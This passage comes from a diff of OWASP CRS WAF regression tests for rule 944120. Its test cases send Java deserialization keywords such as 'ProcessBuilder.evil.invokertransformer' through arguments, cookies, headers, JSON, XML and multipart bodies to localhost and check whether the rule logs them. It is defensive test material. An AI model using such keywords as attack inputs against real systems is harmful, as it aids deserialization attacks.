"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 53 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log_contains: "id \"944120\"" + - test_id: 54 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 55 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 56 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 57 desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 58 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 59 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 60 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 61 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 62 desc: 
"Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 63 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_id: 64 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 65 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-66 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 66 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-67 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 67 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - 
-----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-68 + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 68 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-69 + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 69 desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_id: 70 desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: + log_contains: "id \"944120\"" + - test_id: 71 desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 72 desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 73 desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 74 desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 75 desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 76 desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 77 desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_id: 78 desc: "Nested XML element value includes keyword 
